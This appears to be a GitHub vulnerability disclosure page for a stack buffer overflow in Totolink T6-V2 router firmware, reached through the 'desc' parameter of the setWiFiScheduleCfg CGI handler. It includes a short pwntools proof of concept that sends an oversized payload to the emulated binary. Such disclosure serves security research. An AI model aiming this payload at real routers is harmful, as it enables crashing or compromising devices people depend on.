Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
IoT-vuln/Totolink/T6-v2/4.setWiFiScheduleCfg/
IoT-vuln/Totolink/T6-v2/4.setWiFiScheduleCfg/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

Overview

Affected version

T6-V2 V4.1.9cu.5179_B20201015

Vulnerability details

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_00413be4 (at address 0x413be4) gets the JSON parameter desc, but without checking its length, copies it directly to local variables in the stack, causing stack overflow:

image-20220529103944191

image-20220529104042648

PoC

from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiScheduleCfg",
    "addEffect": "1",
    "enable": "1",
    "desc": "A"*0x400,
    "week": "1",
    "sHour": "1",
    "sMinute": "1",
    "eHour": "1",
    "eMinute": "1",
}

data = json.dumps(data)
print(data)

argv = [
    "qemu-mipsel-static",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi"
]

a = process(argv=argv)
a.sendline(data.encode())

a.interactive()